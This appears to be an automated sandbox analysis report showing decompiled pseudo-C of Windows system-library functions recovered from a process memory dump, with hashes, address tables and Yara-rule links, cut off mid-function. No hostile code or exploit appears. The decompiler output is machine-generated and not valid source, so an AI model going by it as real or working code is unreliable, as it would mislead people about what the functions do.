Opcode ID: c808c2569121a0095ddb9605546383ff9a64394259ef29fd6fa723771146e800
Instruction ID: 675e16c757d677442f7258fbd8c6cda5932cf0427128f17965a7f743b7b4e5b3
Opcode Fuzzy Hash: c808c2569121a0095ddb9605546383ff9a64394259ef29fd6fa723771146e800
Instruction Fuzzy Hash: E0611331E01658AFEB21DF68C940B7E77B9EB44728F140AB9D812D72C9E774B900E791

Uniqueness

Uniqueness Score: -1.00%

Function 049A0EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E049A0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0499FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E049A1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E04919730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0499A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0499A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x49c8b04 >> 0x14) + (_v44 -  *0x49c8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E048F7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0499138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E048F7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0498FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x49c8724 & 0x00000008) != 0) {
						E049952F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E049A15B5(0x49c8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x049a0eb7
0x049a0eb9
0x049a0ec0
0x049a0ec2
0x049a0ecd
0x049a105b
0x049a105b
0x049a1061
0x049a1066
0x049a1066
0x049a106b
0x049a1073
0x049a1073
0x049a0ed3
0x049a0ed6
0x049a0edc
0x049a0ee0
0x049a0ee7
0x049a0ef0
0x049a0ef5
0x049a0efa
0x049a0efc
0x049a0efd
0x049a0f03
0x049a0f04
0x049a0f06
0x049a0f07
0x049a0f09
0x049a0f0e
0x049a0f14
0x049a0f23
0x049a0f2d
0x049a0f34
0x049a0f34
0x049a0f14
0x049a0f52
0x00000000
0x00000000
0x049a0f58
0x049a0f73
0x049a0f74
0x049a0f79
0x049a0f7d
0x049a0f80
0x049a0f86
0x049a0fab
0x049a0fb5
0x049a0fc6
0x049a0fd1
0x049a0fe3
0x049a0fd3
0x049a0fdc
0x049a0fdc
0x049a0feb
0x049a1009
0x049a1009
0x049a1015
0x049a1027
0x049a1017
0x049a1020
0x049a1020
0x049a102f
0x049a103c
0x049a103c
0x049a1048
0x049a1050
0x049a1050
0x049a1055
0x00000000
0x049a1055
0x049a0f88
0x049a0f9e
0x049a0fa2
0x049a0fa9
0x00000000
0x00000000
0x00000000
0x049a0fa9
0x00000000

Strings

`, xrefs: 049A0F16

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 5c8914e9531f48d69cf795b74494d7384cbbbc38524b192afd3236f12f64d89f
Instruction ID: c1632fc99703f8434973ea1afa15289336b3f477dd55d54a845bd3f2fbb16c32
Opcode Fuzzy Hash: 5c8914e9531f48d69cf795b74494d7384cbbbc38524b192afd3236f12f64d89f
Instruction Fuzzy Hash: D551AC702083829FE724DF28D985B1BB7E9EBC4314F04493CF99697290D670F815C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0490F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0490F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E048F4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04919830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04919990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E049195D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0x511cc81a
							_t109 = L048F4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2000511c
								E0491F3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2000511c
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E049195D0();
										L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0490f0d3
0x0490f0d9
0x0490f0e0
0x0490f0e7
0x0490f0f2
0x0490f0f4
0x0490f0f8
0x0490f100
0x0490f108
0x0490f10d
0x0490f115
0x0490f116
0x0490f11f
0x0490f123
0x0490f124
0x0490f12c
0x0490f130
0x0490f134
0x0490f13d
0x0490f144
0x0490f14b
0x0490f152
0x0494bab0
0x0494bab0
0x0490f158
0x0490f158
0x0490f15a
0x0490f160
0x0490f165
0x0490f166
0x0490f16f
0x0490f173
0x0494baa7
0x0494baa7
0x0494baab
0x00000000
0x0490f179
0x0490f179
0x0490f18d
0x0490f191
0x0494baa2
0x00000000
0x0490f197
0x0490f19b
0x0490f1a2
0x0490f1a9
0x0490f1af
0x0490f1b2
0x0490f1b6
0x0490f1b9
0x0490f1c0
0x0490f1c4
0x0490f1d8
0x0490f1df
0x0490f1e3
0x0490f1e6
0x0490f1eb
0x0490f1ee
0x0490f1f4
0x0490f20f
0x0494bab7
0x0494babb
0x0494bacc
0x0494bad1
0x0490f215
0x0490f218
0x0490f226
0x0490f22b
0x00000000
0x0490f22b
0x0490f1f6
0x0490f1f6
0x0490f1f9
0x0490f1fb
0x0490f1fb
0x0490f1f4
0x0490f191
0x0490f173
0x0490f152
0x0490f203

Strings

@, xrefs: 0490F124

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 4347a2b9fc494ed010fa962297a932f06bb1df161829ee66a48a132d6a7a3d4f
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: EB515C716047149FD320DF19C840E67BBF9FF88754F008A2AFA95976A0E7B4E914CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04953540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E04953540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x49cd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E04910BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E04953706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0491FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E04953540;
						E0491FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0492DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E04960C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E049197C0();
					}
					return E0491B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E04953971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E04953884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0491FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E04919650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E04953787(_a4,  &_v352, _t80);
						}
					}
					L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E049195D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x04953552
0x0495355a
0x0495355d
0x04953566
0x04953567
0x0495357e
0x0495358f
0x049535a1
0x049535a5
0x0495366b
0x0495366b
0x0495366d
0x04953672
0x04953679
0x04953685
0x0495368d
0x0495369d
0x049536a7
0x049536b8
0x049536c6
0x049536c7
0x049536dc
0x049536e1
0x049536e7
0x049536e9
0x049536e9
0x04953703
0x04953703
0x049535b5
0x049535c0
0x049535c4
0x00000000
0x00000000
0x049535ca
0x049535d7
0x049535e2
0x049535e6
0x049535e8
0x049535f5
0x049535fa
0x04953603
0x04953604
0x04953609
0x0495360a
0x04953612
0x04953613
0x0495361e
0x04953622
0x04953628
0x0495362f
0x0495362f
0x04953636
0x04953638
0x0495363b
0x04953642
0x04953642
0x04953636
0x04953657
0x04953657
0x0495365c
0x04953662
0x04953669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0495358F

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryHash
API String ID: 2994545307-2202222882
Opcode ID: d838c00341f6751d532047d6e2ea39be87836447600157d2949ad564e626645f
Instruction ID: 5420bfec3f4c1baf6a2778bf795e0a32389131a2a25f35490285acb40cf69065
Opcode Fuzzy Hash: d838c00341f6751d532047d6e2ea39be87836447600157d2949ad564e626645f
Instruction Fuzzy Hash: 8E4132B1D0152C9EEB21DA50CC85F9EB77CAB44758F1045B9EE09AB250DB30AE88CF95

Uniqueness

Uniqueness Score: -1.00%

Function 049A05AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E049A05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E049A07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E04919730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0499A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0499A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E049A1293(_t79, _v40, E049A07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E048F7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0499138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x049a05c5
0x049a05ca
0x049a05d3
0x049a06db
0x049a06db
0x049a06dd
0x049a06e3
0x049a06e3
0x049a05dd
0x049a05e7
0x049a05f6
0x049a0600
0x049a0607
0x049a0610
0x049a0615
0x049a061a
0x049a061c
0x049a061e
0x049a0624
0x049a0625
0x049a0627
0x049a0628
0x049a0631
0x049a0640
0x049a064d
0x049a0654
0x049a0654
0x049a0631
0x049a066d
0x049a0674
0x00000000
0x00000000
0x049a0692
0x049a069e
0x049a06b0
0x049a06a0
0x049a06a9
0x049a06a9
0x049a06b8
0x049a06d6
0x049a06d6
0x00000000

Strings

`, xrefs: 049A0633

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 7e90c0ae6f4d18bc29ff02df95ff1469ae8504e09d3a748e94ffe8cad4af0a4c
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: AB31AF326047456BE720DE29CD85F9A77D9EBC4758F084239BA58AB280D670F924CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 0490A61C, Relevance: 1.4, Strings: 1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0490A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x49b0220);
				E0492D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x49c7b9c; // 0x0
				_t55 = L048F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0492D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x49c7b10 =  *0x49c7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x49c536c; // 0x521858
					if( *_t51 != 0x49c5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x49c5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x49c536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0490A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x0490a61c
0x0490a61e
0x0490a623
0x0490a628
0x0490a62b
0x0490a62d
0x0490a648
0x0490a64a
0x0490a64f
0x04949b44
0x0490a6ec
0x0490a6f1
0x0490a6f1
0x0490a655
0x0490a657
0x0490a65a
0x0490a65d
0x0490a662
0x0490a663
0x0490a667
0x0490a668
0x0490a66d
0x0490a706
0x0490a706
0x04949bda
0x04949be6
0x04949beb
0x00000000
0x04949beb
0x0490a679
0x04949b7a
0x00000000
0x04949b7a
0x0490a683
0x0490a6f4
0x0490a6f7
0x0490a6f9
0x0490a6fd
0x0490a6a0
0x0490a6a0
0x0490a6ad
0x0490a6af
0x0490a6b4
0x04949ba7
0x04949bac
0x00000000
0x00000000
0x04949bc6
0x04949bce
0x04949bd1
0x04949bd3
0x04949bd3
0x00000000
0x04949bd1
0x0490a6bd
0x0490a6c3
0x0490a6c6
0x0490a6d2
0x0490a701
0x0490a704
0x00000000
0x0490a704
0x0490a6d4
0x0490a6d6
0x0490a6d9
0x0490a6db
0x0490a6e1
0x0490a6e6
0x0490a6e8
0x0490a6e8
0x0490a6ea
0x00000000
0x0490a6ea
0x0490a688
0x0490a692
0x0490a694
0x0490a699
0x00000000
0x00000000
0x0490a69d
0x00000000

Strings

XGQ, xrefs: 0490A6CB

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: XGQ
API String ID: 0-1052384954
Opcode ID: 0d190e80b219f56edf8e42ca13db7e91946964c5c8ee8f117eb07bf9daf6499c
Instruction ID: 35cd362a5edb8ecd1252763b7770f7f9e64eca5a5792a8494d1790696721e2b3
Opcode Fuzzy Hash: 0d190e80b219f56edf8e42ca13db7e91946964c5c8ee8f117eb07bf9daf6499c
Instruction Fuzzy Hash: 4F4126B5A00219DFDB14CF68C890B9ABBF2BB99314F15C5B9E804AB384D774B901CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04953884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E04953884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E04919650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L048F4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E04919650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x04953893
0x04953896
0x04953899
0x0495389f
0x049538a0
0x049538a4
0x049538a9
0x049538ac
0x049538ad
0x049538ae
0x049538af
0x049538b1
0x049538b4
0x049538bb
0x049538bc
0x049538bd
0x049538c4
0x049538c8
0x049538ca
0x049538ca
0x049538d5
0x0495393e
0x04953940
0x04953942
0x04953952
0x04953954
0x04953961
0x04953961
0x04953967
0x0495396e
0x0495396e
0x04953947
0x0495394c
0x00000000
0x0495394c
0x049538ea
0x049538ee
0x049538f8
0x049538f9
0x049538ff
0x04953900
0x04953902
0x04953903
0x0495390b
0x0495390f
0x04953950
0x00000000
0x04953950
0x04953915
0x0495391d
0x0495391d
0x04953922
0x04953926
0x00000000
0x04953928
0x0495392b
0x0495392b
0x04953935
0x04953937
0x04953937
0x00000000
0x04953935
0x04953926
0x049538f0
0x00000000

Strings

BinaryName, xrefs: 049538B4

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryName
API String ID: 2994545307-215506332
Opcode ID: ed549b9e66b0ceb980c5155a95d77405ac22bd4b3401b9504ee985bdbc25cbfe
Instruction ID: 1b6aeaaf222a558b72c70ae13e7cd2ac50f06272d7613d3500afe9681f640c49
Opcode Fuzzy Hash: ed549b9e66b0ceb980c5155a95d77405ac22bd4b3401b9504ee985bdbc25cbfe
Instruction Fuzzy Hash: 5B31F4B2900509EFEB25DA58C955D6BF778FF80BA0F218139ED04A7660D730BE00C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0490D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0490D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x49cd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E048F4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0491B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E049198D0();
				_t62 = _v88;
